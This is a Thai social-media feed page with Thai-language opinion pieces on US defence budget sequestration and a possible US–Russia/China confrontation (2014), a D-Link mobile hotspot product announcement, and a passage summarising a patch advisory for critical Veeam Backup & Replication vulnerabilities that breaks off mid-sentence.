    รุกฆาต หรือ รุกคืบ ตอนที่ 4 “รุกฆาต หรือ รุกคืบ” ตอนที่ 4 (ตอนจบ) อเมริกาไม่มีทางเลือกมาก ผ้าเปิดเห็นหมดแล้วว่า หลังจากประเมินคู่หูรัสเซียจีน ผิด คิดไปดักตีหัวเขา ผิดทิศผิดทาง ยังไม่พอ นึกว่าเวลายังมี ดันงัดเอาหนังเรื่อง ตัดเหี้ยน มาออกโรงฉายฆ่าเวลาไป 2 ปี เล่นเอากองทัพแผ่วไปหลายกิโล กองทัพก็เหมือนกล้ามเนื้อท้อง เคยออกกำลังบ่อยๆ วิ่งเล่นไล่จับแถวอิรัค สลับอาฟกานิสถาน มานานเป็นสิบปี พอไม่ค่อยได้ใช้ แถมสั่งถอน สั่งลด สั่งงดการฝึก กล้ามมันก็ห้อยย้อยหมด จะให้กลับขึ้นเป็นแผง มันก็ต้องใช้เวลาฟิต เพราะฉนั้น อเมริกาไม่น่าเลือกใช้วิธีรบยืดเยื้อ เหมือนรบกับอิรัค อาฟกานิสถาน เพราะศักยภาพของรัสเซียและพวก คนละเรื่องกับพวกที่อเมริกาเคยไปวิ่งเล่นไล่จับด้วย อเมริกาอาจจบไม่สวย อาจถึงขนาดไม่สวยอย่างมาก อเมริกาถือตัวว่า ในด้านอาวุธทำลายล้างของตน มีศักยภาพสูงสุด มีเทคโนโลยีที่เหนือกว่าใครๆ ในใลก ดังนั้นโอกาสที่อเมริกา จะเลือกยุทธศาสตร์ สยบฝ่าย รัสเซียและพวก ด้วยกำลังอาวุธสาระพัดชนิด โดยเฉพาะพวกระยะไกล น่าจะมีความเป็นได้สูงกว่า ถ้าเลือกใช้อาวุธนำ อเมริกาจะใช้กับใคร และเมื่อไหร่ ที่สำคัญมันต้องเป็นหมากพิฆาต รุกฆาต ตาเดียวจบ เพราะถ้าไม่รุกฆาตจริง อเมริกาเหนื่อยแน่ การตอบโต้จากอีกฝ่าย คงเกิดขึ้นมาจากสาระพัดทิศอย่างแน่นอน และเราคงได้เห็นดอกเห็ดบานเต็มท้องฟ้า ถ้าอเมริกา ไม่เลือกใช้วิธีรุกฆาตด้วยอาวุธ แต่ใช้ยุทธศาสตร์รุกคืบ ค่อยๆเคลื่อนพลปิดล้อม ฝ่ายรัสเซียและพวก เหมือนลนไฟให้ร้อนระอุขึ้นเรื่อยๆ กระจายตามที่ต่างๆ ตามจังหวะความพร้อมของตัว สมันน้อยก็เตรียมตัวกันด้วยแล้วกัน จะไปขุดรู อยู่ป่า ก็เริ่มคิดไว้บ้าง ไอ้ประเภทสร้างอุโมงค์เตรียมให้ประชาชนหลบภัย เตรียมน้ำ เตรียมยา อาหาร นั่นมันในหนัง หรือบ้านอื่นที่ท่านผู้นำเขามองการณ์ไกล แล้วคิดว่า ฝ่ายรัสเซียกับพวก เขาจะนั่งตาลอย ทำหน้าหล่อ มองอเมริกาขยับหมากอยู่ฝ่ายเดียวอย่างนั้นหรือ!?! สวัสดีครับ คนเล่านิทาน 14 ธค. 2557
    0 Comments 0 Shares 220 Views 0 Reviews
  • รุกฆาต หรือ รุกคืบ ตอนที่ 2
    “รุกฆาต หรือ รุกคืบ”
    ตอนที่ 2

    คงจำกันได้ เมื่อปี ค.ศ. 2011 อเมริกามีปัญหาถังแตก กระเป๋าฉีก (เป็นบ่อยเหมือนกันนะ ไหนว่ารวยไง) จะต้องมีการตัดงบประมาณรายจ่ายของประเทศเป็นการใหญ่ ฝ่ายรัฐบาลโอบามาจะให้ตัดงบด้านความมั่นคงเป็นส่วนใหญ่และตัดงบประมาณด้านสวัสดิการประชาชนน้อยกว่า เพื่อเลี้ยงฐานเสียง แต่พรรคฝ่ายค้าน บรรดาเหยี่ยวกระหายเลือด มีความเห็นตรงกันข้าม ไม่ยอมให้แตะงบด้านความมั่นคง แบบนี้จะไปมองหน้าพ่อค้าอาวุธนายทุนใหญ่ทั้งหลายได้ยังไง เลือกตั้งครั้งหน้าจะทำยังไง ทำให้รัฐบาลและฝ่ายค้านตกลงกันไม่ได้

    ในที่สุด นายโอบามาวางสนุ้ก โดยลงนามใน Budget Control Act of 2011 ซึ่งมีผลเป็นการตัดงบประมาณทั้ง กระดานเท่ากัน ซึ่งเรียกกันว่า ” Sequestrations” ตัดอัตโนมัติ ตัดเท่ากัน ตัดเหี้ยน ไม่ว่าจะด้านความมั่นคง หรือสวัสดิการ เริ่มตั้งแต่ปีงบประมาณ 2013 ไปจนถึง ปี 2021 นายโอบามาหวังจะให้วุฒิสมาชิกทั้งฝ่ายรัฐบาล และฝ่ายค้าน ร่วมมือกันหาทางออก แต่จนถึงบัดนี้ยังหาประตูกันไม่เจอ ส่วนนายโอบามา ได้รับก้อนอิฐจากทุกสารทิศ ทั้งจากสภา และประชาชนปาใส่ยังไม่เลิก

    ฝ่ายความมั่นคง โดยนาย Pennetta รมว. กลาโหมขณะนั้น บอกว่าเรื่องนี้เรื่องใหญ่นะ ตัดงบแบบนี้ ในส่วนของกลาโหม 10 ปี คิดแล้วงบหดไป 20 % และจะทำให้กองทัพ
    – มีทหารราบเหลือน้อยที่สุด นับแต่สงครามโลก ครั้งที่ 2
    – มีกองทัพเรือเล็กที่สุด นับแต่ก่อนสงครามโลก ครั้งที่ 1
    – มีหน่วยรบด้านกลยุทธที่เล็กที่สุดในประวัติศาสตร์ของกองทัพอากาศ
    – มีกำลังพล ที่เป็นพลเรือนน้อยที่สุด ในประวัติศาสตร์ ของกลาโหม

    แต่การตัดงบประมาณ แบบตัดเหี้ยน Sequestration ก็ยังเดินหน้าต่อไป ตอนนั้นอเมริกาคงยังมองไม่เห็น แปลสัญญาณ การขยับหมากของรัสเซียและจีนไม่ออก

    นาง Michele Flournoy ตัวเก็งหมายเลขหนึ่ง ที่นายโอบามา ทาบทามมาให้นั่งเก้าอี้รัฐมนตรีกลาโหม หลังปลดนาย Chuck Hagel เมื่อ กลางเดือนพฤศจิกายนที่ผ่านมานี้ ได้เขียนบทความ เกี่ยวกับการตัดงบประมาณแบบตัดเหี้ยนนี้ ซึ่ง Washington Post นำมาลงเมื่อวันที่ 19 สิงหาคม 2014 ว่า

    ” ฤดูร้อนปีนี้ เราเห็นเหตุการณ์โลกที่มีการเปลี่ยนแปลงอย่างเหลือเชื่อ ตั้งแต่การเกิดขึ้นของ Islamic State การรุกรานUkraine ของรัสเซีย สงครามระหว่าง ฮามาส กับอิสราเอล ความตึงเครียดในน่านน้ำเกาหลี และทะเลจีน เป็นการเตือนให้รู้ว่า อเมริกาอาจจะเจอกับการท้าทาย ด้านความมั่นคง ที่ซับซ้อน ผันแปรรวดเร็ว อย่างไม่เคยมีมาก่อน นับตั้งแต่สงครามโลกครั้งที่ 2 เลยทีเดียว
    ทั้งนี้คณะทำงานของ The National Defense Panel ซึ่งตั้งโดยสภาสูง (ที่มีนาง Flournoy เป็นหนึ่งในคณะทำงาน) ได้ทำรายงาน สรุปว่า Budget Control Act of 2011 เป็นยุทธศาสตร์ที่ “ผิดพลาดอย่างรุนแรง” ถ้าไม่มีการยกเลิก หรือผ่อนปรนโดยเร็ว กองทัพของอเมริกาจะตกอยู่ในความเสี่ยงอย่างสูง และจะไม่สามารถปฏิบัติภาระกิจ ตามยุทธศาสตร์ด้านความมั่นคงของประเทศได้

    นาง Flournoy แจงเพิ่มเติมว่า การตัดงบตามกฏหมายดังกล่าว ทำให้การฝึกของนักบินไม่สามารถทำได้ตามจำนวนชั่วโมงที่ต้องการ เพื่อรักษาความชำนาญ และกองทัพเรือไม่สามารถไปประจำอยู่ในบริเวณที่วิกฤติได้…

    The National Defense Panel จึงขอให้สภาสูง พิจารณายกเลิก Budget Control Act ดังกล่าวทันที เพื่อให้กองทัพ สามารถยับยั้ง หรือหยุดความรุกรานในหลายๆที่ และรวมทั้งสามารถทำการรบ ในสงครามที่มีขนาดใหญ่ได้ (large-scale war) ซึ่งจำเป็นต้องมีการพิจารณาถึง ขนาด และรูปแบบของกองทัพเป็นการด่วน เพื่อเราจะได้ดำเนินการปกป้องผลประโยชน์ของเราที่มีอยู่ทั่วโลก และจัดหาวิธีการต่อสู้สงครามอย่างเหมาะสม ที่จะเป็นการรับประกันสถานะการเป็นผู้นำของอเมริกา…”

    Flournoy ไม่ได้เป็นคนเดียวที่ออกมาแสดงความเห็นคัดค้าน อย่างไม่อ้อมค้อม

    Gen. Gary Cheek รองปลัดกลาโหม ด้านแผนงาน และนโยบาย ให้สัมภาษณ์ ในวันประชุมประจำปี ของ AUSA Convention เมื่อ 15 ตุลาคม 2014 ว่า

    “การ ยกเลิก Sequestration เท่านั้นแหละ ถึงจะเป็นการแก้ปัญหาที่ต้นตอ ขณะนี้ เราส่ง 7 กองกำลัง ไปประจำการณ์อยู่ต่างประเทศ จากจำนวน 10 กองกำลังด้านนี้ที่เรามี ถ้ามีการตัดงบประมาณต่อไป การหมุนเวียนกำลังพล ทำไม่ได้มาก กำลังพลที่ไปประจำการณ์ ต่างประเทศนานๆ ก็จะอยู่ในภาวะเครียดหนัก

    ตั้งแต่เริ่มรายการตัดงบเมื่อปี 2011 เป็นต้นมา กองทัพได้ยกเลิกไปแล้ว 21 แผนงาน ชลอ 125 แผนงาน และปรับปรุง 124 ที่แย่ คือ งบวิจัยและปรับปรุง ถูกตัดไปแล้ว 1 ใน 3 และหลังจากรบยาวติดต่อกันมา 12 ปี เราต้องมีการปรับปรุงอาวุธ และเครื่องมือ เครื่องใช้เรานะ”

    หลังจากนั้น ปลายเดือนตุลาคม 2014 ถึงคิว นาย Robert Gates อดีต รมว. กลาโหม อีกคนหนึ่ง ก็ออกมาพูดว่า ” สภาสูง ทำให้ Pentagon อยู่ในสภาพที่แย่ที่สุดในทุกทาง และเพื่อจะปกป้องพันธมิตร และผลประโยชน์ของอเมริกาในเอเซีย อเมริกาต้องมีระบบจรวดป้องกันทรัพย์สินของอเมริกาที่อยู่ในอวกาศ และเครือข่ายไซเบอร์ และต้องลงทุนในระบบการป้องกันระยะไกล อเมริกาไม่มีทางเลือก ที่จะไม่ลงทุน มันจำเป็นที่เราจะต้องรักษาขนาดของกองทัพ ความพร้อม และสมรรถนะ เพื่อปกป้องผลประโยชน์ของเราทั่วโลก ”
    และ ล่าสุด นาย Bob Work รมช. กลาโหม ออกมาพูดเมื่อ วันที่ 1 ธันวาคม นี้ ที่ สถาบัน Center for Strategic and International Studies ถังความคิดชื่อดังของวอชิงตันว่า การ ตัดงบแบบSequestration นี้ ทำให้ความชำนาญในการรบของกองทัพลดลง ถ้ากองทัพต้องปฏิบัติการณ์ ทำนองเดียวกับ Desert Storm สมัยขยี้ Saddam Hussien ตอนนี้บอกได้ว่าคงเหนื่อยแน่

    นอกจากนี้ เขาบอกว่า สมัยช่วงก่อนปี 2001 นายทหารที่อยู่ในกองทัพมา กว่า 10 ปี จะได้เข้ารับการฝึกแบบ full spectrum combat training หลายครั้ง ก่อนเลื่อนตำแหน่งเป็นระดับหัวหน้า แต่เดี๋ยวนี้ไม่มีแล้ว เพราะตอนนี้ กลาโหมเน้นการรบเป็นรูปแบบการรับมือการก่อความไม่สงบ ถ้าจะเป็นการรบใหญ่จริงๆ เราต้องฝึกกันใหม่ และถ้ายังมีการตัดงบประมาณอย่างนี้ กว่าเริ่มฝีกใหม่ได้ ก็คงเป็นปี 2016 โน้นแน่ะ

    รู้สึกฝ่ายกลาโหมของอเมริกาจะโหมโรงหนังเรื่อง ตัดเหี้ยน Sequestration อย่างพร้อมเพรียง ในจังหวะน่าสนใจ!

    สวัสดีครับ
    คนเล่านิทาน
    13 ธค. 2557
    รุกฆาต หรือ รุกคืบ ตอนที่ 2 “รุกฆาต หรือ รุกคืบ” ตอนที่ 2 คงจำกันได้ เมื่อปี ค.ศ. 2011 อเมริกามีปัญหาถังแตก กระเป๋าฉีก (เป็นบ่อยเหมือนกันนะ ไหนว่ารวยไง) จะต้องมีการตัดงบประมาณรายจ่ายของประเทศเป็นการใหญ่ ฝ่ายรัฐบาลโอบามาจะให้ตัดงบด้านความมั่นคงเป็นส่วนใหญ่และตัดงบประมาณด้านสวัสดิการประชาชนน้อยกว่า เพื่อเลี้ยงฐานเสียง แต่พรรคฝ่ายค้าน บรรดาเหยี่ยวกระหายเลือด มีความเห็นตรงกันข้าม ไม่ยอมให้แตะงบด้านความมั่นคง แบบนี้จะไปมองหน้าพ่อค้าอาวุธนายทุนใหญ่ทั้งหลายได้ยังไง เลือกตั้งครั้งหน้าจะทำยังไง ทำให้รัฐบาลและฝ่ายค้านตกลงกันไม่ได้ ในที่สุด นายโอบามาวางสนุ้ก โดยลงนามใน Budget Control Act of 2011 ซึ่งมีผลเป็นการตัดงบประมาณทั้ง กระดานเท่ากัน ซึ่งเรียกกันว่า ” Sequestrations” ตัดอัตโนมัติ ตัดเท่ากัน ตัดเหี้ยน ไม่ว่าจะด้านความมั่นคง หรือสวัสดิการ เริ่มตั้งแต่ปีงบประมาณ 2013 ไปจนถึง ปี 2021 นายโอบามาหวังจะให้วุฒิสมาชิกทั้งฝ่ายรัฐบาล และฝ่ายค้าน ร่วมมือกันหาทางออก แต่จนถึงบัดนี้ยังหาประตูกันไม่เจอ ส่วนนายโอบามา ได้รับก้อนอิฐจากทุกสารทิศ ทั้งจากสภา และประชาชนปาใส่ยังไม่เลิก ฝ่ายความมั่นคง โดยนาย Pennetta รมว. กลาโหมขณะนั้น บอกว่าเรื่องนี้เรื่องใหญ่นะ ตัดงบแบบนี้ ในส่วนของกลาโหม 10 ปี คิดแล้วงบหดไป 20 % และจะทำให้กองทัพ – มีทหารราบเหลือน้อยที่สุด นับแต่สงครามโลก ครั้งที่ 2 – มีกองทัพเรือเล็กที่สุด นับแต่ก่อนสงครามโลก ครั้งที่ 1 – มีหน่วยรบด้านกลยุทธที่เล็กที่สุดในประวัติศาสตร์ของกองทัพอากาศ – มีกำลังพล ที่เป็นพลเรือนน้อยที่สุด ในประวัติศาสตร์ ของกลาโหม แต่การตัดงบประมาณ แบบตัดเหี้ยน Sequestration ก็ยังเดินหน้าต่อไป ตอนนั้นอเมริกาคงยังมองไม่เห็น แปลสัญญาณ การขยับหมากของรัสเซียและจีนไม่ออก นาง Michele Flournoy ตัวเก็งหมายเลขหนึ่ง ที่นายโอบามา ทาบทามมาให้นั่งเก้าอี้รัฐมนตรีกลาโหม หลังปลดนาย Chuck Hagel เมื่อ กลางเดือนพฤศจิกายนที่ผ่านมานี้ ได้เขียนบทความ เกี่ยวกับการตัดงบประมาณแบบตัดเหี้ยนนี้ ซึ่ง Washington Post นำมาลงเมื่อวันที่ 19 สิงหาคม 2014 ว่า ” ฤดูร้อนปีนี้ เราเห็นเหตุการณ์โลกที่มีการเปลี่ยนแปลงอย่างเหลือเชื่อ ตั้งแต่การเกิดขึ้นของ Islamic State การรุกรานUkraine ของรัสเซีย สงครามระหว่าง ฮามาส กับอิสราเอล ความตึงเครียดในน่านน้ำเกาหลี และทะเลจีน เป็นการเตือนให้รู้ว่า อเมริกาอาจจะเจอกับการท้าทาย ด้านความมั่นคง ที่ซับซ้อน ผันแปรรวดเร็ว อย่างไม่เคยมีมาก่อน นับตั้งแต่สงครามโลกครั้งที่ 2 เลยทีเดียว ทั้งนี้คณะทำงานของ The National Defense Panel ซึ่งตั้งโดยสภาสูง (ที่มีนาง Flournoy เป็นหนึ่งในคณะทำงาน) ได้ทำรายงาน สรุปว่า Budget Control Act of 2011 เป็นยุทธศาสตร์ที่ “ผิดพลาดอย่างรุนแรง” ถ้าไม่มีการยกเลิก หรือผ่อนปรนโดยเร็ว กองทัพของอเมริกาจะตกอยู่ในความเสี่ยงอย่างสูง และจะไม่สามารถปฏิบัติภาระกิจ ตามยุทธศาสตร์ด้านความมั่นคงของประเทศได้ นาง Flournoy แจงเพิ่มเติมว่า การตัดงบตามกฏหมายดังกล่าว ทำให้การฝึกของนักบินไม่สามารถทำได้ตามจำนวนชั่วโมงที่ต้องการ เพื่อรักษาความชำนาญ และกองทัพเรือไม่สามารถไปประจำอยู่ในบริเวณที่วิกฤติได้… The National Defense Panel จึงขอให้สภาสูง พิจารณายกเลิก Budget Control Act ดังกล่าวทันที เพื่อให้กองทัพ สามารถยับยั้ง หรือหยุดความรุกรานในหลายๆที่ และรวมทั้งสามารถทำการรบ ในสงครามที่มีขนาดใหญ่ได้ (large-scale war) ซึ่งจำเป็นต้องมีการพิจารณาถึง ขนาด และรูปแบบของกองทัพเป็นการด่วน เพื่อเราจะได้ดำเนินการปกป้องผลประโยชน์ของเราที่มีอยู่ทั่วโลก และจัดหาวิธีการต่อสู้สงครามอย่างเหมาะสม ที่จะเป็นการรับประกันสถานะการเป็นผู้นำของอเมริกา…” Flournoy ไม่ได้เป็นคนเดียวที่ออกมาแสดงความเห็นคัดค้าน อย่างไม่อ้อมค้อม Gen. Gary Cheek รองปลัดกลาโหม ด้านแผนงาน และนโยบาย ให้สัมภาษณ์ ในวันประชุมประจำปี ของ AUSA Convention เมื่อ 15 ตุลาคม 2014 ว่า “การ ยกเลิก Sequestration เท่านั้นแหละ ถึงจะเป็นการแก้ปัญหาที่ต้นตอ ขณะนี้ เราส่ง 7 กองกำลัง ไปประจำการณ์อยู่ต่างประเทศ จากจำนวน 10 กองกำลังด้านนี้ที่เรามี ถ้ามีการตัดงบประมาณต่อไป การหมุนเวียนกำลังพล ทำไม่ได้มาก กำลังพลที่ไปประจำการณ์ ต่างประเทศนานๆ ก็จะอยู่ในภาวะเครียดหนัก ตั้งแต่เริ่มรายการตัดงบเมื่อปี 2011 เป็นต้นมา กองทัพได้ยกเลิกไปแล้ว 21 แผนงาน ชลอ 125 แผนงาน และปรับปรุง 124 ที่แย่ คือ งบวิจัยและปรับปรุง ถูกตัดไปแล้ว 1 ใน 3 และหลังจากรบยาวติดต่อกันมา 12 ปี เราต้องมีการปรับปรุงอาวุธ และเครื่องมือ เครื่องใช้เรานะ” หลังจากนั้น ปลายเดือนตุลาคม 2014 ถึงคิว นาย Robert Gates อดีต รมว. กลาโหม อีกคนหนึ่ง ก็ออกมาพูดว่า ” สภาสูง ทำให้ Pentagon อยู่ในสภาพที่แย่ที่สุดในทุกทาง และเพื่อจะปกป้องพันธมิตร และผลประโยชน์ของอเมริกาในเอเซีย อเมริกาต้องมีระบบจรวดป้องกันทรัพย์สินของอเมริกาที่อยู่ในอวกาศ และเครือข่ายไซเบอร์ และต้องลงทุนในระบบการป้องกันระยะไกล อเมริกาไม่มีทางเลือก ที่จะไม่ลงทุน มันจำเป็นที่เราจะต้องรักษาขนาดของกองทัพ ความพร้อม และสมรรถนะ เพื่อปกป้องผลประโยชน์ของเราทั่วโลก ” และ ล่าสุด นาย Bob Work รมช. กลาโหม ออกมาพูดเมื่อ วันที่ 1 ธันวาคม นี้ ที่ สถาบัน Center for Strategic and International Studies ถังความคิดชื่อดังของวอชิงตันว่า การ ตัดงบแบบSequestration นี้ ทำให้ความชำนาญในการรบของกองทัพลดลง ถ้ากองทัพต้องปฏิบัติการณ์ ทำนองเดียวกับ Desert Storm สมัยขยี้ Saddam Hussien ตอนนี้บอกได้ว่าคงเหนื่อยแน่ นอกจากนี้ เขาบอกว่า สมัยช่วงก่อนปี 2001 นายทหารที่อยู่ในกองทัพมา กว่า 10 ปี จะได้เข้ารับการฝึกแบบ full spectrum combat training หลายครั้ง ก่อนเลื่อนตำแหน่งเป็นระดับหัวหน้า แต่เดี๋ยวนี้ไม่มีแล้ว เพราะตอนนี้ กลาโหมเน้นการรบเป็นรูปแบบการรับมือการก่อความไม่สงบ ถ้าจะเป็นการรบใหญ่จริงๆ เราต้องฝึกกันใหม่ และถ้ายังมีการตัดงบประมาณอย่างนี้ กว่าเริ่มฝีกใหม่ได้ ก็คงเป็นปี 2016 โน้นแน่ะ รู้สึกฝ่ายกลาโหมของอเมริกาจะโหมโรงหนังเรื่อง ตัดเหี้ยน Sequestration อย่างพร้อมเพรียง ในจังหวะน่าสนใจ! สวัสดีครับ คนเล่านิทาน 13 ธค. 2557
    0 Comments 0 Shares 357 Views 0 Reviews
  • “D-Link เปิดตัวชุดอุปกรณ์ 5G/4G Mobile Access ใหม่” — เชื่อมต่อโลกเคลื่อนที่ด้วย Wi-Fi 6 และดีไซน์เพื่อชีวิตดิจิทัล

    D-Link ประกาศขยายไลน์ผลิตภัณฑ์ 5G/4G Mobile Access Series เพื่อตอบโจทย์การเชื่อมต่ออินเทอร์เน็ตที่ยืดหยุ่นและปลอดภัยสำหรับผู้ใช้งานยุคใหม่ ไม่ว่าจะเป็นนักเดินทาง, คนทำงานระยะไกล หรือครอบครัวที่ต้องการอินเทอร์เน็ตแบบพกพา

    ซีรีส์ใหม่นี้ประกอบด้วยอุปกรณ์หลากหลายประเภท เช่น mobile hotspot, mobile router และ USB adapter โดยทุกตัวรองรับ Wi-Fi 6 เพื่อความเร็วและความปลอดภัยที่เหนือกว่า

    ไฮไลต์ของผลิตภัณฑ์:

    F530 5G NR AX3000 Mobile Hotspot: หน้าจอสัมผัสควบคุมง่าย พร้อมฟีเจอร์แชร์ไฟล์ในตัว เหมาะสำหรับมืออาชีพที่ต้องการความเร็วและความคล่องตัว

    F518 5G NR AX1800 Mobile Hotspot: แบตเตอรี่ความจุสูง ใช้งานได้ทั้งวัน และสามารถใช้เป็น power bank ได้

    DBR-330-G 5G NR AX3000 Mobile Router: เหมาะสำหรับบ้านหรือออฟฟิศขนาดเล็ก รองรับ VPN และการแชร์ไฟล์

    DWR-932W 4G LTE AX300 Mobile Hotspot: ขนาดกะทัดรัด ใช้งานง่าย เหมาะสำหรับผู้ใช้ทั่วไป

    D501 5G NR USB Adapter: เสาอากาศพับได้ เชื่อมต่อผ่าน USB สำหรับโน้ตบุ๊กและพีซี

    DWM-222W 4G LTE USB Adapter: ตัวเลือกแบบ plug-and-play ที่รองรับหลายแพลตฟอร์ม

    ผลิตภัณฑ์ทั้งหมดออกแบบภายใต้แนวคิด “One Connection – Infinite Possibilities” โดยเน้นความยั่งยืน ความคิดสร้างสรรค์ และการบริการแบบครบวงจร

    ข้อมูลในข่าว
    D-Link เปิดตัวชุดอุปกรณ์ 5G/4G Mobile Access Series ใหม่
    รองรับ Wi-Fi 6 เพื่อความเร็วและความปลอดภัยที่เหนือกว่า
    F530 มีหน้าจอสัมผัสและฟีเจอร์แชร์ไฟล์ในตัว
    F518 มีแบตเตอรี่ความจุสูงและใช้เป็น power bank ได้
    DBR-330-G รองรับ VPN และเหมาะสำหรับบ้านหรือออฟฟิศ
    DWR-932W เป็น 4G hotspot ขนาดเล็ก ใช้งานง่าย
    D501 เป็น USB adapter 5G พร้อมเสาอากาศพับได้
    DWM-222W เป็น USB adapter 4G แบบ plug-and-play
    อุปกรณ์ทั้งหมดออกแบบเพื่อชีวิตเคลื่อนที่และการใช้งานที่หลากหลาย
    แนวคิด “One Connection – Infinite Possibilities” สะท้อนความยืดหยุ่นของผลิตภัณฑ์

    https://www.techpowerup.com/341925/d-link-expands-its-5g-4g-mobile-access-series
    📶 “D-Link เปิดตัวชุดอุปกรณ์ 5G/4G Mobile Access ใหม่” — เชื่อมต่อโลกเคลื่อนที่ด้วย Wi-Fi 6 และดีไซน์เพื่อชีวิตดิจิทัล D-Link ประกาศขยายไลน์ผลิตภัณฑ์ 5G/4G Mobile Access Series เพื่อตอบโจทย์การเชื่อมต่ออินเทอร์เน็ตที่ยืดหยุ่นและปลอดภัยสำหรับผู้ใช้งานยุคใหม่ ไม่ว่าจะเป็นนักเดินทาง, คนทำงานระยะไกล หรือครอบครัวที่ต้องการอินเทอร์เน็ตแบบพกพา ซีรีส์ใหม่นี้ประกอบด้วยอุปกรณ์หลากหลายประเภท เช่น mobile hotspot, mobile router และ USB adapter โดยทุกตัวรองรับ Wi-Fi 6 เพื่อความเร็วและความปลอดภัยที่เหนือกว่า ไฮไลต์ของผลิตภัณฑ์: 🔋 F530 5G NR AX3000 Mobile Hotspot: หน้าจอสัมผัสควบคุมง่าย พร้อมฟีเจอร์แชร์ไฟล์ในตัว เหมาะสำหรับมืออาชีพที่ต้องการความเร็วและความคล่องตัว 🔋 F518 5G NR AX1800 Mobile Hotspot: แบตเตอรี่ความจุสูง ใช้งานได้ทั้งวัน และสามารถใช้เป็น power bank ได้ 🏠 DBR-330-G 5G NR AX3000 Mobile Router: เหมาะสำหรับบ้านหรือออฟฟิศขนาดเล็ก รองรับ VPN และการแชร์ไฟล์ 📱 DWR-932W 4G LTE AX300 Mobile Hotspot: ขนาดกะทัดรัด ใช้งานง่าย เหมาะสำหรับผู้ใช้ทั่วไป 💻 D501 5G NR USB Adapter: เสาอากาศพับได้ เชื่อมต่อผ่าน USB สำหรับโน้ตบุ๊กและพีซี 💻 DWM-222W 4G LTE USB Adapter: ตัวเลือกแบบ plug-and-play ที่รองรับหลายแพลตฟอร์ม ผลิตภัณฑ์ทั้งหมดออกแบบภายใต้แนวคิด “One Connection – Infinite Possibilities” โดยเน้นความยั่งยืน ความคิดสร้างสรรค์ และการบริการแบบครบวงจร ✅ ข้อมูลในข่าว ➡️ D-Link เปิดตัวชุดอุปกรณ์ 5G/4G Mobile Access Series ใหม่ ➡️ รองรับ Wi-Fi 6 เพื่อความเร็วและความปลอดภัยที่เหนือกว่า ➡️ F530 มีหน้าจอสัมผัสและฟีเจอร์แชร์ไฟล์ในตัว ➡️ F518 มีแบตเตอรี่ความจุสูงและใช้เป็น power bank ได้ ➡️ DBR-330-G รองรับ VPN และเหมาะสำหรับบ้านหรือออฟฟิศ ➡️ DWR-932W เป็น 4G hotspot ขนาดเล็ก ใช้งานง่าย ➡️ D501 เป็น USB adapter 5G พร้อมเสาอากาศพับได้ ➡️ DWM-222W เป็น USB adapter 4G แบบ plug-and-play ➡️ อุปกรณ์ทั้งหมดออกแบบเพื่อชีวิตเคลื่อนที่และการใช้งานที่หลากหลาย ➡️ แนวคิด “One Connection – Infinite Possibilities” สะท้อนความยืดหยุ่นของผลิตภัณฑ์ https://www.techpowerup.com/341925/d-link-expands-its-5g-4g-mobile-access-series
    WWW.TECHPOWERUP.COM
    D-Link Expands Its 5G/4G Mobile Access Series
    D-Link Corporation (TWSE: 2332), one of the global leaders in networking solutions, today announced its expanded 5G/4G Mobile Access Series, a comprehensive lineup designed to meet the growing demand for flexible, high-speed connectivity. The new portfolio empowers users to overcome the limitations ...
    0 Comments 0 Shares 164 Views 0 Reviews
  • “พบช่องโหว่ RCE ร้ายแรงใน Veeam Backup & Replication — CVSS 9.9 เปิดทางแฮ็กเกอร์เข้าควบคุมระบบสำรองข้อมูล”

    Veeam ผู้พัฒนาโซลูชันสำรองข้อมูลยอดนิยมสำหรับองค์กร ได้ออกแพตช์ความปลอดภัยเพื่อแก้ไขช่องโหว่ร้ายแรง 2 รายการ ได้แก่ CVE-2025-48983 และ CVE-2025-48984 ซึ่งมีคะแนน CVSS สูงถึง 9.9 จาก 10 ถือเป็นระดับ “วิกฤต” ที่อาจเปิดทางให้ผู้โจมตีสามารถรันโค้ดจากระยะไกล (Remote Code Execution) ได้โดยไม่ต้องยืนยันตัวตน

    ช่องโหว่เหล่านี้ส่งผลกระทบต่อ Veeam Backup & Replication เวอร์ชันก่อนหน้า 12.1.2.172 ซึ่งเป็นซอฟต์แวร์ที่ใช้กันอย่างแพร่หลายในองค์กรทั่วโลกเพื่อสำรองและกู้คืนข้อมูลจากเซิร์ฟเวอร์, VM, และคลาวด์ หากถูกโจมตีสำเร็จ แฮ็กเกอร์อาจเข้าถึงข้อมูลสำรอง, ปรับเปลี่ยนการตั้งค่า, หรือแม้แต่ลบข้อมูลสำคัญขององค์กรได้

    Veeam แนะนำให้ผู้ใช้ทุกคนอัปเดตเป็นเวอร์ชัน 12.1.2.172 หรือใหม่กว่าโดยทันที และหากไม่สามารถอัปเดตได้ในทันที ควรปิดการเข้าถึงพอร์ต TCP 9401 ซึ่งเป็นช่องทางที่ใช้ในการโจมตี

    พบช่องโหว่ CVE-2025-48983 และ CVE-2025-48984 ใน Veeam Backup & Replication
    มีคะแนน CVSS 9.9 ถือเป็นระดับ “วิกฤต”

    ช่องโหว่เปิดทางให้โจมตีแบบ Remote Code Execution (RCE)
    โดยไม่ต้องยืนยันตัวตน

    ส่งผลกระทบต่อเวอร์ชันก่อน 12.1.2.172
    รวมถึงระบบที่เปิดพอร์ต TCP 9401

    Veeam ออกแพตช์แก้ไขในเวอร์ชัน 12.1.2.172
    พร้อมคำแนะนำให้อัปเดตทันที

    หากยังไม่สามารถอัปเดตได้
    ควรปิดพอร์ต TCP 9401 ชั่วคราวเพื่อป้องกันการโจมตี

    ช่องโหว่ถูกค้นพบโดยนักวิจัยด้านความปลอดภัยภายนอก
    และได้รับการยืนยันโดยทีม Veeam

    https://securityonline.info/critical-rce-flaws-cve-2025-48983-cve-2025-48984-cvss-9-9-found-in-veeam-backup-replication/
    🛡️ “พบช่องโหว่ RCE ร้ายแรงใน Veeam Backup & Replication — CVSS 9.9 เปิดทางแฮ็กเกอร์เข้าควบคุมระบบสำรองข้อมูล” Veeam ผู้พัฒนาโซลูชันสำรองข้อมูลยอดนิยมสำหรับองค์กร ได้ออกแพตช์ความปลอดภัยเพื่อแก้ไขช่องโหว่ร้ายแรง 2 รายการ ได้แก่ CVE-2025-48983 และ CVE-2025-48984 ซึ่งมีคะแนน CVSS สูงถึง 9.9 จาก 10 ถือเป็นระดับ “วิกฤต” ที่อาจเปิดทางให้ผู้โจมตีสามารถรันโค้ดจากระยะไกล (Remote Code Execution) ได้โดยไม่ต้องยืนยันตัวตน ช่องโหว่เหล่านี้ส่งผลกระทบต่อ Veeam Backup & Replication เวอร์ชันก่อนหน้า 12.1.2.172 